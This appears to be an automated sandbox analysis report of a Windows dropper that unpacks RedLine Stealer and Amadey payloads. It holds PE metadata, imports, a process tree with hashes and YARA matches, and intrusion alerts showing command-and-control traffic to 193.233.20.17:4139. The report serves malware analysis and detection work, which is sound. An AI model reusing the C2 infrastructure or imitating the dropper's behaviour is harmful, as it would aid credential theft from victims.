                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                          je 00007F47BCC77069h
                                                                                                                                                                                                                                          mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                                                          mov eax, 000000FFh
                                                                                                                                                                                                                                          jmp 00007F47BCC77189h
                                                                                                                                                                                                                                          mov dword ptr [004081E4h], esi
                                                                                                                                                                                                                                          cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                          jne 00007F47BCC7706Dh
                                                                                                                                                                                                                                          push 004010B4h
                                                                                                                                                                                                                                          push 004010ACh
                                                                                                                                                                                                                                          call 00007F47BCC77735h
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          mov dword ptr [000088B0h], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0xb25f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbf000 | 0x888 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0xb3000 | 0xb2600 | False | 0.9483345742817099 | data | 7.915927904909951 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xbf000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| AVI | 0xcb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States |
| RT_ICON | 0xf94c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States |
| RT_ICON | 0xffb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States |
| RT_ICON | 0x1029c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States |
| RT_ICON | 0x10484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States |
| RT_ICON | 0x105ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States |
| RT_ICON | 0x11454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States |
| RT_ICON | 0x11cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States |
| RT_ICON | 0x123c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States |
| RT_ICON | 0x1292c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
| RT_ICON | 0x20300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States |
| RT_ICON | 0x228a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States |
| RT_ICON | 0x23950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States |
| RT_ICON | 0x242d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States |
| RT_DIALOG | 0x24740 | 0x2f2 | data | English | United States |
| RT_DIALOG | 0x24a34 | 0x35c | data | Russian | Russia |
| RT_DIALOG | 0x24d90 | 0x1b0 | data | English | United States |
| RT_DIALOG | 0x24f40 | 0x1b4 | data | Russian | Russia |
| RT_DIALOG | 0x250f4 | 0x166 | data | English | United States |
| RT_DIALOG | 0x2525c | 0x168 | data | Russian | Russia |
| RT_DIALOG | 0x253c4 | 0x1c0 | data | English | United States |
| RT_DIALOG | 0x25584 | 0x1e0 | data | Russian | Russia |
| RT_DIALOG | 0x25764 | 0x130 | data | English | United States |
| RT_DIALOG | 0x25894 | 0x150 | data | Russian | Russia |
| RT_DIALOG | 0x259e4 | 0x120 | data | English | United States |
| RT_DIALOG | 0x25b04 | 0x122 | data | Russian | Russia |
| RT_STRING | 0x25c28 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States |
| RT_STRING | 0x25cb4 | 0x86 | Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0 | Russian | Russia |
| RT_STRING | 0x25d3c | 0x520 | data | English | United States |
| RT_STRING | 0x2625c | 0x52e | data | Russian | Russia |
| RT_STRING | 0x2678c | 0x5cc | data | English | United States |
| RT_STRING | 0x26d58 | 0x592 | data | Russian | Russia |
| RT_STRING | 0x272ec | 0x4b0 | data | English | United States |
| RT_STRING | 0x2779c | 0x4b2 | data | Russian | Russia |
| RT_STRING | 0x27c50 | 0x44a | data | English | United States |
| RT_STRING | 0x2809c | 0x43e | data | Russian | Russia |
| RT_STRING | 0x284dc | 0x3ce | data | English | United States |
| RT_STRING | 0x288ac | 0x2fc | data | Russian | Russia |
| RT_RCDATA | 0x28ba8 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0x28bb0 | 0x9491a | Microsoft Cabinet archive data, many, 608538 bytes, 2 files, at 0x2c +A "sEm51bM.exe" +A "nIp99Jf.exe", ID 1891, number 1, 25 datablocks, 0x1503 compression | English | United States |
| RT_RCDATA | 0xbd4cc | 0x4 | data | English | United States |
| RT_RCDATA | 0xbd4d0 | 0x24 | data | English | United States |
| RT_RCDATA | 0xbd4f4 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0xbd4fc | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0xbd504 | 0x4 | data | English | United States |
| RT_RCDATA | 0xbd508 | 0xc | data | English | United States |
| RT_RCDATA | 0xbd514 | 0x4 | data | English | United States |
| RT_RCDATA | 0xbd518 | 0xc | data | English | United States |
| RT_RCDATA | 0xbd524 | 0x4 | data | English | United States |
| RT_RCDATA | 0xbd528 | 0x5 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0xbd530 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0xbd538 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_GROUP_ICON | 0xbd540 | 0xbc | data | English | United States |
| RT_VERSION | 0xbd5fc | 0x408 | data | English | United States |
| RT_VERSION | 0xbda04 | 0x410 | data | Russian | Russia |
| RT_MANIFEST | 0xbde14 | 0x7e2 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States |

| DLL | Import |
|---|---|
| ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges |
| KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA |
| GDI32.dll | GetDeviceCaps |
| USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics |
| msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset |
| COMCTL32.dll | |
| Cabinet.dll | |
| VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
| Russian | Russia | |

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 02/19/23-02:32:23.476854 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 4139 | 49699 | 193.233.20.17 | 192.168.2.3 |
| 02/19/23-02:32:35.640007 | TCP | 2043231 | ET TROJAN Redline Stealer TCP CnC Activity | 49699 | 4139 | 192.168.2.3 | 193.233.20.17 |
| 02/19/23-02:32:22.070574 | TCP | 2043233 | ET TROJAN RedLine Stealer TCP CnC net.tcp Init | 49699 | 4139 | 192.168.2.3 | 193.233.20.17 |
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.171603918 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.172175884 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.215698957 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.239433050 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.279166937 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.316579103 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.339760065 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:33.388473988 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:34.851272106 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:34.874078035 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:34.874370098 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:34.919847012 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:34.987217903 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.010979891 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.019686937 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.043313980 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.044576883 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.067986965 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.099214077 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.122812986 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.169902086 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.239923000 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.263230085 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.310482979 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.436047077 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.463315964 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.465219021 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.489403963 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.501846075 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.525026083 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.576174021 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.616517067 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.639223099 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.639585018 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.640007019 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.665282965 CET413949699193.233.20.17192.168.2.3
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.716769934 CET496994139192.168.2.3193.233.20.17
                                                                                                                                                                                                                                          Feb 19, 2023 02:32:35.723017931 CET496994139192.168.2.3193.233.20.17


                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:02:31:55
                                                                                                                                                                                                                                          Start date:19/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\21fvBVFMsn.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\Desktop\21fvBVFMsn.exe
                                                                                                                                                                                                                                          Imagebase:0xa40000
                                                                                                                                                                                                                                          File size:764928 bytes
                                                                                                                                                                                                                                          MD5 hash:478E1C903CFCDA85ACDB9759AE80E155
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.241227286.0000000004A02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                          Start time:02:31:55
                                                                                                                                                                                                                                          Start date:19/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe
                                                                                                                                                                                                                                          Imagebase:0x320000
                                                                                                                                                                                                                                          File size:571904 bytes
                                                                                                                                                                                                                                          MD5 hash:EE9CEC71CDD89A723F90D5013E963B02
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          • Detection: 69%, ReversingLabs
                                                                                                                                                                                                                                          • Detection: 55%, Virustotal, Browse
                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                          Start time:02:31:56
                                                                                                                                                                                                                                          Start date:19/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe
                                                                                                                                                                                                                                          Imagebase:0x10d0000
                                                                                                                                                                                                                                          File size:206848 bytes
                                                                                                                                                                                                                                          MD5 hash:EA0FADAB5F038CDB93F37EA867C62934
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          • Detection: 69%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                          Start time:02:31:56
                                                                                                                                                                                                                                          Start date:19/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe
Imagebase:0x6e0000
File size:11264 bytes
MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 85%, ReversingLabs
Reputation:high

Target ID:4
Start time:02:32:04
Start date:19/02/2023
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:0x7ff630c50000
File size:69632 bytes
MD5 hash:73C519F050C20580F8A62C849D49215A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

Target ID:5
Start time:02:32:07
Start date:19/02/2023
Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe
Imagebase:0x4e0000
File size:179200 bytes
MD5 hash:C9C03EC2426C8416841FD7E93BB9DC3D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.267575199.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 96%, ReversingLabs
Reputation:moderate

Target ID:6
Start time:02:32:13
Start date:19/02/2023
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Imagebase:0x7ff630c50000
File size:69632 bytes
MD5 hash:73C519F050C20580F8A62C849D49215A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

Target ID:14
Start time:02:32:21
Start date:19/02/2023
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
Imagebase:0x7ff630c50000
File size:69632 bytes
MD5 hash:73C519F050C20580F8A62C849D49215A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high


Execution Graph

Execution Coverage:28.7%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:30.7%
Total number of Nodes:962
Total number of Limit Nodes:25
a4557c 2761->2764 2766 a4555c 2762->2766 2816 a458c8 2763->2816 2764->2748 2765->2756 2767 a4658a CharPrevA 2765->2767 2766->2748 2768 a45568 RemoveDirectoryA 2766->2768 2767->2756 2768->2748 2770 a4265e 2769->2770 2771 a4266f 2769->2771 2772 a444b9 20 API calls 2770->2772 2773 a46ce0 4 API calls 2771->2773 2772->2771 2774 a42687 2773->2774 2774->2608 2774->2622 2776 a469a1 2775->2776 2777 a4696e GetDiskFreeSpaceA 2775->2777 2776->2630 2777->2776 2778 a46989 MulDiv 2777->2778 2778->2776 2780 a459dd GetDiskFreeSpaceA 2779->2780 2781 a459bb 2779->2781 2783 a45ba1 memset 2780->2783 2784 a45a21 MulDiv 2780->2784 2782 a444b9 20 API calls 2781->2782 2785 a459cc 2782->2785 2786 a46285 GetLastError 2783->2786 2784->2783 2787 a45a50 GetVolumeInformationA 2784->2787 2788 a46285 GetLastError 2785->2788 2789 a45bbc GetLastError FormatMessageA 2786->2789 2790 a45ab5 SetCurrentDirectoryA 2787->2790 2791 a45a6e memset 2787->2791 2792 a459d1 2788->2792 2793 a45be3 2789->2793 2800 a45acc 2790->2800 2794 a46285 GetLastError 2791->2794 2798 a46ce0 4 API calls 2792->2798 2795 a444b9 20 API calls 2793->2795 2796 a45a89 GetLastError FormatMessageA 2794->2796 2797 a45bf5 SetCurrentDirectoryA 2795->2797 2796->2793 2797->2792 2799 a45c11 2798->2799 2799->2608 2801 a45b20 2800->2801 2802 a45b0a 2800->2802 2801->2792 2828 a4268b 2801->2828 2803 a444b9 20 API calls 2802->2803 2803->2792 2807 a453bf 2805->2807 2806 a4171e _vsnprintf 2806->2807 2807->2806 2808 a4658a CharPrevA 2807->2808 2811 a45415 GetTempFileNameA 2807->2811 2809 a453fa RemoveDirectoryA GetFileAttributesA 2808->2809 2809->2807 2810 a4544f CreateDirectoryA 2809->2810 2810->2811 2812 a4543a 2810->2812 2811->2812 2813 a45429 DeleteFileA CreateDirectoryA 2811->2813 2814 a46ce0 4 API calls 2812->2814 2813->2812 2815 a45449 2814->2815 2815->2751 2817 a458d8 2816->2817 2817->2817 2818 a458df LocalAlloc 2817->2818 2819 a458f3 2818->2819 2820 a45919 2818->2820 2821 a444b9 20 API calls 2819->2821 2823 a4658a CharPrevA 2820->2823 2826 
a45906 2821->2826 2822 a46285 GetLastError 2827 a45534 2822->2827 2824 a45931 CreateFileA LocalFree 2823->2824 2825 a4595b CloseHandle GetFileAttributesA 2824->2825 2824->2826 2825->2826 2826->2822 2826->2827 2827->2753 2827->2754 2829 a426e5 2828->2829 2830 a426b9 2828->2830 2831 a4271f 2829->2831 2832 a426ea 2829->2832 2833 a4171e _vsnprintf 2830->2833 2835 a426e3 2831->2835 2838 a4171e _vsnprintf 2831->2838 2834 a4171e _vsnprintf 2832->2834 2836 a426cc 2833->2836 2837 a426fd 2834->2837 2839 a46ce0 4 API calls 2835->2839 2840 a444b9 20 API calls 2836->2840 2841 a444b9 20 API calls 2837->2841 2842 a42735 2838->2842 2843 a4276d 2839->2843 2840->2835 2841->2835 2844 a444b9 20 API calls 2842->2844 2843->2792 2844->2835 2846 a4468f 7 API calls 2845->2846 2847 a44ff5 FindResourceA LoadResource LockResource 2846->2847 2848 a45020 2847->2848 2861 a4515f 2847->2861 2849 a45057 2848->2849 2850 a45029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2850 2864 a44efd 2849->2864 2850->2849 2853 a45060 2855 a444b9 20 API calls 2853->2855 2854 a4507c 2856 a45075 2854->2856 2857 a444b9 20 API calls 2854->2857 2855->2856 2858 a45110 FreeResource 2856->2858 2859 a4511d 2856->2859 2857->2856 2858->2859 2860 a4513a 2859->2860 2863 a444b9 20 API calls 2859->2863 2860->2861 2862 a4514c SendMessageA 2860->2862 2861->2648 2862->2861 2863->2860 2865 a44f4a 2864->2865 2866 a44fa1 2865->2866 2872 a44980 2865->2872 2868 a46ce0 4 API calls 2866->2868 2869 a44fc6 2868->2869 2869->2853 2869->2854 2873 a44990 2872->2873 2874 a449a5 2873->2874 2875 a449c2 lstrcmpA 2873->2875 2876 a444b9 20 API calls 2874->2876 2877 a449ba 2875->2877 2878 a44a0e 2875->2878 2876->2877 2877->2866 2880 a44b60 2877->2880 2878->2877 2883 a4487a 2878->2883 2881 a44b92 FindCloseChangeNotification 2880->2881 2882 a44b76 2880->2882 2881->2882 2882->2866 2884 a448a2 CreateFileA 2883->2884 2886 a44908 2884->2886 2887 a448e9 2884->2887 2886->2877 2887->2886 2888 a448ee 2887->2888 2891 a4490c 2888->2891 2892 a448f5 
CreateFileA 2891->2892 2894 a44917 2891->2894 2892->2886 2893 a44962 CharNextA 2893->2894 2894->2892 2894->2893 2895 a44953 CreateDirectoryA 2894->2895 2895->2893 2897 a42510 2896->2897 2898 a4255b 2896->2898 2899 a4658a CharPrevA 2897->2899 2900 a46ce0 4 API calls 2898->2900 2901 a42522 WritePrivateProfileStringA _lopen 2899->2901 2902 a42569 2900->2902 2901->2898 2903 a42548 _llseek _lclose 2901->2903 2902->2657 2903->2898 2905 a41b25 2904->2905 3009 a41a84 2905->3009 2907 a41b57 2908 a4658a CharPrevA 2907->2908 2910 a41b8c 2907->2910 2908->2910 2909 a466c8 2 API calls 2911 a41bd1 2909->2911 2910->2909 2912 a41d73 2911->2912 2913 a41bd9 CompareStringA 2911->2913 2915 a466c8 2 API calls 2912->2915 2913->2912 2914 a41bf7 GetFileAttributesA 2913->2914 2916 a41d53 2914->2916 2917 a41c0d 2914->2917 2918 a41d7d 2915->2918 2919 a41d64 2916->2919 2917->2916 2924 a41a84 2 API calls 2917->2924 2920 a41d81 CompareStringA 2918->2920 2921 a41df8 LocalAlloc 2918->2921 2922 a444b9 20 API calls 2919->2922 2920->2921 2929 a41d9b 2920->2929 2921->2919 2923 a41e0b GetFileAttributesA 2921->2923 2925 a41d6c 2922->2925 2926 a41e1d 2923->2926 2943 a41e45 2923->2943 2927 a41c31 2924->2927 2931 a46ce0 4 API calls 2925->2931 2926->2943 2928 a41c50 LocalAlloc 2927->2928 2933 a41a84 2 API calls 2927->2933 2928->2919 2930 a41c67 GetPrivateProfileIntA GetPrivateProfileStringA 2928->2930 2929->2929 2932 a41dbe LocalAlloc 2929->2932 2938 a41cf8 2930->2938 2942 a41cc2 2930->2942 2936 a41ea1 2931->2936 2932->2919 2937 a41de1 2932->2937 2933->2928 2936->2679 2939 a4171e _vsnprintf 2937->2939 2940 a41d23 2938->2940 2941 a41d09 GetShortPathNameA 2938->2941 2939->2942 2944 a4171e _vsnprintf 2940->2944 2941->2940 2942->2925 3015 a42aac 2943->3015 2944->2942 